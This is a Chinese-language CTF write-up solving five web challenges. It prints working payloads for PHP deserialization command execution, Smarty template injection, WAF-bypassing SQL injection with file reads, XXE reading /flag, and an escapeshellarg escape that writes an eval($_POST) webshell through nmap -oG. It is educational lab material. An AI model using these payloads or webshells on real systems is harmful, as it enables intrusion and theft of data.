渗透测试练习题解析 3(CTF web)

1、[网鼎杯 2020 朱雀组]phpweb 1

考点:反序列化漏洞利用

进入靶场,查看检查信息,发现存在两个参数 func 和 p

查看页面源代码

payload:func=file_get_contents&p=php://filter/resource=index.php

整理后,就是 PHP 代码审计了

   <?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");//过滤命令执行的关键字
    function gettime($func, $p) {
        $result = call_user_func($func, $p);//这里由于使用了call_user_func,这个函数是突破口
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        //过滤
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>

gettime 中使用了 call_user_func() 函数

也就是说 $func 会被当成回调函数来执行,而 $p 则当做 $func 的参数

Test 类中存在魔术方法 __destruct(),在到某个对象的所有引用都被删除或者当对象被显式销毁时执行的魔术方法。(new 和 unserialize  触发

因为该方法会在类被销毁时调用,所以我们反序列化一个类,在类里面的参数中写上我们要执行的代码和函数,这样的话就会直接调用 gettime 函数,不会执行 in_array($func,$disable_fun) ,从而绕过黑名单。

不了解序列化和反序列化的先看下面的文章

反序列化漏洞详解-CSDN博客

序列化与反序列化介绍_序列化和反序列化-CSDN博客

接下来就是解题思路了

我们还不知道 flag 有关的文件在哪,所以需要查看目录,利用 call_user_func() 函数的特性,我们给第一个参数传递系统命令:system;第二个参数传递:ls,来查看目录,然后为了绕过黑名单,我们需要先把 system("ls") 序列化一下

<?php
    function gettime($func,$p){
        $result = call_user_func($func,$p);
        $a = gettype($result);
        if($a == "string"){
            return $result;
        }else{ return " "; }
    }
    class Test{
        var $func = "system";
        var $p = "ls";
        function __destruct(){
            if($this->func != " "){
                echo gettime($this->func,$this->p);
            }
        }
    }

    $a = new Test();
    echo serialize($a);
?>

O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:2:"ls";}

把序列化后的字符串当做 $p 的值传给 $func ,$func 则传一个反序列化函数

payload:func=unserialize=&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:2:"ls";}

发现回显了一些文件,但是并没有与 flag 有的文件,我们可以尝用命令去目录中搜索相关的文件名

payload:func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:18:"find / -name flag*";}

提交后会有些慢,因为要扫描目录,等待就好了

大家可以用 burp ,那样得到的数据是清晰的,这样子的数据太混乱了,不方便阅读,由上图所示,猜测 /tmp/flagoefiu4r93 里面就有我们的 flag,接下来对该文件进行读取。

class Test{
        var $func = "system";
        var $p = "cat /tmp/flagoefiu4r93";
        function __destruct(){
            if($this->func != " "){
                echo gettime($this->func,$this->p);
            }
        }
    }

payload:func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:22:"cat /tmp/flagoefiu4r93";}

flag{29c9b107-32ff-446b-8474-e4121e71b421}

2、[BJDCTF2020]The mystery of ip 1

考点:SSTI 模版注入

看到 IP 地址,联想到 X-Forwarded-For,构造 XFF ,发现回显的是我们构造的 IP 地址

实际上,不管我们输入什么都会回显给我们,猜测是 SSTI 模版注入,猜测是模版注入后我们可以用 {{ 命令 }} 的方式来注入

接下来就入住命令来获取关键信息

构造payload

X-Forwarded-For:{{system("ls")}}

发现 flag.php 我们查看一下,发现并没有出现 flag,我们再查看一下根目录

X-Forwarded-For:{{system("ls /")}}

出现了 flag,查看一下

{{system("cat /flag")}}

另一种方式,实际上也是注入命令,不过表达的方式不太一样。先查看一下是什么类型的模版

PHP常见的模板:twig,smarty,blade

X-Forwarded-For:{{(config}}

发现是 smarty 模版

Smarty自学笔记_smarty html原样输出-CSDN博客

查看目录

{if system(“ls”)}{/if}

这里的flag.php是假的,要查根目录下的

{if system(“ls /”)}{/if}

获取 flag

X-Forwarded-For:{if system("cat /flag")}{/if}

3、[网鼎杯 2018]Fakebook 1

考点:序列化和反序列化 + SSRF + SQL 注入 + base64 编码

进入页面,没发现可疑的地方,也不存在 SQL 注入,注册个账户看看

点击 admin 进入用户,发现 URL 存在参数,这里可能存在注入点

输入:1 and 1=1 ,页面回显正常

输入:1 and 1=2 ,页面回显异常

说明页面存在 SQL 注入,且为数字型注入

判断列数,4 列的时候正常,5 列的时候异常,说明存在 4 列

先使用联合注入试试看,判断回显位

-1 union select 1,2,3,4

没法用,猜测是某些关键字被过滤了,试了很多绕过都不行,最后看大佬的 wp 才知道存在 WAF,union select 被过滤了 ,使用 /**/ 可以绕过

-1 union/**/select 1,2,3,4

爆破数据库名

爆破表格名

-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()

【group_concat(table_name) 和 from information_schema.XXXXXXXX 是可以分开写的,因为 group_concat() 是独立的,回显点在哪 group_concat() 就放在哪】

举个例子:

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

爆破字段名

-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'

爆破字段内容

其他字段内容都没什么可疑的,只有 data 字段内的内容可疑,我们注册的账号被序列化输出了

-1 union/**/select 1,group_concat(data),3,4 from users

莫名其妙,应该是前面漏了什么步骤,回去看大佬 wp,发现本题还存在源码泄露问题,利用 kali 的后台扫描工具 dirb 进行扫描,发现 robots.txt 这个敏感信息文件

访问后里面的内容记录着一个备份文件 /user.php.bak (.bak 为后缀的为备份文件),访问直接下载

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

代码审计

  • curl_init:初始化一个 curl 会话,供 curl_setopt(),curl_exec() 和 curl_close() 函数使用
  • curl_setopt:请求一个 url,其中 CURLOPT_URL 表示需要获取的 URL 地址,后面就是跟上了它的值
  • CURLOPT_RETURNTRANSFER 将 curl_exec() 获取的信息以文件流的形式返回,而不是直接输出
  • curl_exec,成功时返回 TRUE,或者在失败时返回 FALSE。然而,如果 CURLOPT_RETURNTRANSFER 选项被设置,函数执行成功时会返回执行的结果,失败时返回 FALSE
  • CURLINFO_HTTP_CODE:最后一个收到的 HTTP 代码
  • curl_getinfo:以字符串形式返回它的值,因为设置了 CURLINFO_HTTP_CODE,所以返回的是状态码。如果状态码不是 404,就返回 exec 的结果。

get 函数在 getBlogContents 中被调用

blog 作为参数

由于代码使用正则限制了 blog 的内容,所以只能使用序列化把 blog 注入进去

序列化代码

注意要照葫芦画瓢,类名为 Userinfo ,name 、age和爆破出来的字段内容一样(也就是注册时的内容)

<?php
class Userinfo{
    public $name = "admin";
    public $age = 123;
    public $blog = "file:///var/www/html/flag.php";
}

$a = new Userinfo();
echo serialize($a);
?>

结果

O:8:"Userinfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:123;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

构造 payload

-1 union/**/select 1,2,3,'O:8:"Userinfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:123;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

这里为什么是注入在 4 的位置?

因为 data 这个表的位置在第 4 列,而根据回显信息可以猜测 data 字段存在漏洞,会对内容进行一次序列化,所以把内容注入到 data 中

查看页面源代码,对该字符串进行 base64 解码

非预期解法

使用 SQL 的 load_file()

payload:no=-1 union/**/select 1,load_file('/var/www/html/flag.php'),3,4

查看源代码直接出结果

下图内容取自:BUUCTF[网鼎杯 2018]Fakebook 1 - LoYoHo00 - 博客园 (cnblogs.com)

4、[NCTF2019]Fake XML cookbook 1

考点:XXE 漏洞

进入靶场

谁便输入看看提示什么

提示登录失败,开始考虑的是 SQL 注入,发现没有注入点,退回去看题目,有 XML 的字样,猜测应该是考察 XXE 漏洞 (XML 外部实体注入漏洞)

不了解该漏洞的看这篇文章

浅谈XML实体注入漏洞 - FreeBuf网络安全行业门户

服务器端漏洞篇之XML外部实体注入(XXE)专题 - FreeBuf网络安全行业门户

懒得看的这里我给大家简单介绍一下

XXE 漏洞产生的原因:

        应用程序解析 XML 输入时,没有禁止外部实体的加载,导致可加载恶意外部软件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起 DOS 攻击等危害。【XXE 漏洞触发的点往往是可以上传 XML 文件的位置没有对上传的 XML 文件进行过滤,导致可上传恶意 XML 文件】


XML 和 HTML 区别:

XML 被设计为传输和存储数据,其焦点是数据的内容。

HTML 被设计用来显示数据,其焦点是数据的外观。

当然,XXE 也存在隐藏攻击的方式,有些地方可以在没有输入任何 XML 格式的数据的情况下发动 XXE 攻击,例如

  • XInclude 攻击
  • 通过文件上传的 XXE 攻击
  • 通过修改 Content-Type 的 XXE 攻击

1、XInclude 攻击

        有些应用程序的服务端会将从客户端接收的内容嵌入到 XML 文档中然后解析,这就导致因为我们无法控制整个 XML 文档而无法发动常规的 XXE 攻击,但是我们可以通过 XInclude 在该 XML 文档中构建子 XML 文档,想要使用 XInclude 我们需要引入相应的命名空间。(详细看上面第二条链接)

2、通过文件上传的 XXE 攻击

        有的应用程序允许上传 XML 格式的文件,比如 office 文档或 SVG 图像,然后这些文件也会因为在服务端解析而触发 XXE 攻击。

深入简出 SVG 教程 - 知乎 (zhihu.com)

3、通过修改 Content-Type 的 XXE 攻击

        大部分的 POST 请求的 Content-Type 都是表单类型(application/x-www-form-urlencoded),但是有的应用程序允许将其修改成 text/xml,这样我们就可以将报文内容替换成 XML 格式的内容了,如下所示

POST /action HTTP/1.0

Content-Type:text/xml

Content-Length:52

<?xml version="1.0" encoding="UTF-8"?>

<foo>bar</foo>

下面是本题的解题思路

要注意这里,加 &  、;  前面就是没注意到这点一直做不出来

payload

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY adm SYSTEM "file:///flag">
  ]>
<user><username>&adm;</username><password>123456</password></user>

5、[BUUCTF 2018]Online Tool 1

考点:escapeshellarg () 和 escapeshellcmd () 漏洞 + nmap 文件写入的利用

进入靶场,代码审计

分析代码

PHP 中 $_SERVER 参数 HTTP_X_FORWARDED_FORREMOTE_ADDR

在 PHP 中使用 $_SERVER["REMOTE_ADDR"] 来获取客户端的 IP 地址,如果客户端使用代理服务器来访问,那取到的就是代理服务器的 IP 地址,而不是真正的客户端 IP 地址。若想透过代理服务器获取客户端的真实 IP 地址,就要使用 $_SERVER["HTTP_X_FORWARDED_FOR"] 来获取。

【当然了,并不是每个代理服务器都能用 $_SERVER["HTTP_X_FORWARDED_FOR"] 来读取客户端的真实 IP,有些用此方法读取到的仍然是代理服务器的 IP】

(如果客户端通过代理服务器,则取 HTTP_X_FORWARDED_FOR 的值,如果没通过代理服务器,就取 REMOTE_ADDR 的值)

escapeshellarg:把字符串转码为可以在 shell 命令里使用的参数。

escapeshellarg 在 CTF 中的利用:

  • 参数注入(开发人员错误的使用 escapeshellarg 函数)
  • 逃逸字符串(该函数非二进制安全)

escapeshellcmd:shell 元字符转义

(escapeshellarg 和 escapeshellcmd 相似,主要看是否有引号)

PHP chdir () 函数:

它将 PHP 的当前目录更改为传递的目录。

<?php
    echo getcwd() . "\n";
    
    chdir('html');

    echo getcwd() . "\n";
?>

/*
输出结果:
/home/tutorialspoint
/home/tutorialspoint/html/
*/

PHP mkdir () 函数:用来创建目录

代码整体功能:

1、首先判断客户端提供给服务器和服务器自动获取的 IP 是否一致。

2、判断 get host 参数的传值,没有传值调用 highlight_file(__FILE__)。

3 、传值,host 传递参数经过 escapeshellarg、escapeshellcmd 函数的限制。

4、以 ‘glzjin’ + IP 通过 md5 加密,结果作为文件名创建文件。调用 chdir ()  函数,当前文件地址更改为创建的文件

5、输出 system 执行结果

解题思路

escapeshellarg 处理后先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。

举例:

192.168.1.100' -oG 经过 escapeshellarg 处理后就变成 ' 192.168.1.100 ' \' ' -oG ' 以被转义的单引号为中心左右被分成两部分并且加上单引号。

随后再进过 escapeshellcmd 时变成:' 192.168.1.100 ' \\ ' ' -oG \' 【会发现将不成对的单引号及 \ 符号再次添加 \ 】前面被转义的单引号被认为是和 -oG 左边单引号成对的,导致 -oG 右边的单引号被认为是不成对的单引号,因此被转义。

这位博主写的很详细【[BUUCTF 2018]Online Tool - My_Dreams - 博客园 (cnblogs.com)】

代码的本意是要我们输入 IP 这样的参数做一个扫描,通过前面说的那两个函数来进行规则过滤,我们的输入会被单引号括起来,但是因为前面我们所描述的漏洞告诉我们可以逃脱引号的束缚

-oG 是 nmap 的一个参数,可以实现将命令和结果写到文件

正是因为 nmap 存在 -oG 这个参数,所以我们可以控制自己的输入写入到文件,配合一句话木马来使用。当然也可以使用命令 cat /flag

方法一:一句话木马

?host=' <?php @eval($_POST["123"]);?> -oG hack.php '

构造完 payload 回车后,页面会显示文件名

使用蚁剑进行连接

fcbaaa3b-8c9f-46d1-a647-3790cd66ccb3.node5.buuoj.cn:81/2776a2b4045f0b6fecd14c61ea2a61b0/hack.php

提示

hack.php 文件名自定义,后缀是 .php 就好

方法二:直接使用命令

?host=' <?php echo `cat /flag`;?> -oG abc.php '

注意:

  • cat /flag 用反引号括起来;
  • 单引号和 < > 之间需要有空格

把路径拼接好即可

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/385535.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

数据结构与算法:单链表

朋友们大家好&#xff0c;本节来到数据结构与算法的新内容&#xff1a;单链表 在上篇文章中&#xff0c;我们知道顺序表通常需要预分配一个固定大小的内存空间&#xff0c; 通常以二倍的大小进行增容&#xff0c;可能会造成空间的浪费&#xff0c;本篇文章我们介绍的链表可以解…

去除vue自带的边距

使用vue时发现总有去不掉的外边距&#xff0c;在index.vue里面怎样设置样式都不管用 查阅资料后发现要在vue项目自带的index.html文件内添加下面的样式代码才行 <style>*{margin: 0;padding: 0;}body,html{margin: 0;padding: 0;} </style>

二、DataX安装

DataX安装 一、简介二、系统要求三、部署 一、简介 官方地址&#xff1a;https://github.com/alibaba/DataX/blob/master/userGuid.md 二、系统要求 LinuxJDK(1.8以上&#xff0c;推荐1.8) Centos7.9的java1.8安装命令&#xff1a;yum install java-1.8.0-openjdk.x86_64 Py…

【新书推荐】7.6节 相对基址加变址寻址方式

本节内容&#xff1a;基址加变址寻址方式。 ■基址加变址寻址方式&#xff1a;指令操作数为内操作数&#xff0c;操作数地址使用[基址寄存器变址寄存器]表示。 7.6.1 基址加变址寻址方式 基址加变址寻址方式的操作数在存储器中&#xff0c;操作数的有效地址由基地址寄存器&am…

day 20(补2.5)

fread 函数&#xff1a; 今日练习 C语言面试题5道~ 1. static 有什么用途&#xff1f;&#xff08;请至少说明两种&#xff09; 1) 限制变量的作用域 2) 设置变量的存储域 2. 引用与指针有什么区别&#xff1f; 1) 引用必须被初始化&#xff0c;指针不必。 2) 引用初始…

幻兽帕鲁服务器原来的存档不想玩了,怎么清档?如何重来?

如果需要备份原存档的话&#xff0c;就先把存档导出来备份。或者手动去服务器文件里找到游戏存档文件夹&#xff0c;保存下载。 如无需备份原存档&#xff0c;则可以直接使用幻兽帕鲁应用模板&#xff0c;来重装服务器的操作系统。 方法很简单&#xff1a; 详细教程地…

mysql经典4张表问题

1.数据库表结构关联图 2.问题&#xff1a; 1、查询"01"课程比"02"课程成绩高的学生的信息及课程分数3.查询平均成绩大于等于60分的同学的学生编号和学生姓名和平均成绩4、查询名字中含有"风"字的学生信息5、查询课程名称为"数学"&…

网络协议与攻击模拟_17HTTPS 协议

HTTPShttpssl/tls 1、加密算法 2、PKI&#xff08;公钥基础设施&#xff09; 3、证书 4、部署HTTPS服务器 部署CA证书服务器 5、分析HTTPS流量 分析TLS的交互过程 一、HTTPS协议 在http的通道上增加了安全性&#xff0c;传输过程通过加密和身份认证来确保传输安全性 1、TLS …

【制作100个unity游戏之25】3D背包、库存、制作、快捷栏、存储系统、砍伐树木获取资源、随机战利品宝箱3(附带项目源码)

效果演示 文章目录 效果演示系列目录前言丢弃物品源码完结 系列目录 前言 欢迎来到【制作100个Unity游戏】系列&#xff01;本系列将引导您一步步学习如何使用Unity开发各种类型的游戏。在这第25篇中&#xff0c;我们将探索如何用unity制作一个3D背包、库存、制作、快捷栏、存…

netstat命令

netstat 是一个计算机网络命令行工具&#xff0c;用于显示网络连接、路由表和网络接口等网络相关信息。netstat 命令可以在各种操作系统上使用&#xff0c;包括 Windows、Linux 和 macOS 等。 在使用 netstat 命令时&#xff0c;可以提供不同的选项来显示不同类型的网络信息。…

助力智能化农田作物除草,基于轻量级YOLOv8n开发构建农田作物场景下玉米苗、杂草检测识别分析系统

在我们前面的系列博文中&#xff0c;关于田间作物场景下的作物、杂草检测已经有过相关的开发实践了&#xff0c;结合智能化的设备可以实现只能除草等操作&#xff0c;玉米作物场景下的杂草检测我们则少有涉及&#xff0c;这里本文的主要目的就是想要基于最新的YOLOv8下最轻量级…

微信问一问·流量赚钱专栏

微信问一问流量赚钱专栏 1493读者&#xff0c;104内容 看专栏解百惑&#xff0c;赚到钱 问一问免费涨粉利器 独家更新 100 篇「问一问」经验贴。带你入门&#xff0c;解惑&#xff0c;提效&#xff0c;涨粉&#xff0c;赚小钱 零成本单日公众号涨粉 1000 &#xff0c;专栏成…

《Java 简易速速上手小册》第9章:Java 开发工具和框架 (2024 最新版)

文章目录 9.1 Maven 和 Gradle - 构建与依赖管理的神兵利器9.1.1 基础知识9.1.2 重点案例&#xff1a;使用 Maven 构建 Spring Boot 应用9.1.3 拓展案例 1&#xff1a;使用 Gradle 构建多模块项目9.1.4 拓展案例 2&#xff1a;利用 Gradle Wrapper 确保构建的一致性 9.2 Spring…

【数据结构】哈希表的开散列和闭散列模拟

哈希思想 在顺序和树状结构中&#xff0c;元素的存储与其存储位置之间是没有对应关系&#xff0c;因此在查找一个元素时&#xff0c;必须要经过多次的比较。 顺序查找的时间复杂度为0(N)&#xff0c;树的查找时间复杂度为log(N)。 我们最希望的搜索方式&#xff1a;通过元素的…

计算x的平方根x含负数和复数cmath.sqrt(x)

【小白从小学Python、C、Java】 【计算机等考500强证书考研】 【Python-数据分析】 计算x的平方根 x含负数和复数 cmath.sqrt(x) cmath.sqrt(-4)输出的结果是&#xff1f; import cmath import math a 4 print("【显示】a ",a) print("【执行】math.sqrt(a)&…

InstantBox:开箱即用的临时 Linux 环境

在云计算和虚拟化技术日益成熟的今天&#xff0c;我们有时需要一个快速、简单、临时的 Linux 环境来进行各种任务。这就是 InstantBox 的用武之地。 什么是 InstantBox&#xff1f; InstantBox 是一个开源项目&#xff0c;它可以快速启动临时的 Linux 系统&#xff0c;并提供…

HeidiSQL安装配置(基于小皮面板(phpstudy))连接MySQL

下载资源 对于这款图形化工具&#xff0c;博主建议通过小皮面板&#xff08;phpstudy&#xff09;来下载即可&#xff0c;也是防止你下载到钓鱼软件&#xff0c;小皮面板&#xff08;phpstudy&#xff09;如果你不懂是什么&#xff0c;请看下面链接这篇博客 第二篇&#xff1a;…

Vision Transformer Pytorch 实现代码学习记录

目前运营的社交平台账号&#xff1a; CSDN 【雪天鱼】: 雪天鱼-CSDN博客哔哩哔哩 【雪天鱼】: 雪天鱼个人主页-bilibili.com 可能后续有更新&#xff0c;也可能没有更新&#xff0c;谨慎参考 V1.0 24-02-13 ViT 代码的基本训练, 预测推理脚本运行 1 学习目标 能用官方的 ViT…

React18原理: 核心包结构与两大工作循环

React核心包结构 1 ) react react基础包&#xff0c;只提供定义 react组件(ReactElement)的必要函数一般来说需要和渲染器(react-dom,react-native)一同使用在编写react应用的代码时, 大部分都是调用此包的api比如, 我们定义组件的时候&#xff0c;就是它提供的class Demo ext…

Stream Query Denoising for Vectorized HD Map Construction

参考代码&#xff1a;截止2024.02未开源 动机与出发点 这篇文章是在StreamMapNet的基础上做的&#xff0c;为了在局部地图感知任务上提升时序上的感知稳定性&#xff0c;参考DN-DETR中的去噪方案&#xff0c;为局部地图感知提出一种针对局部地图元素的加噪声方案以及去噪逻辑。…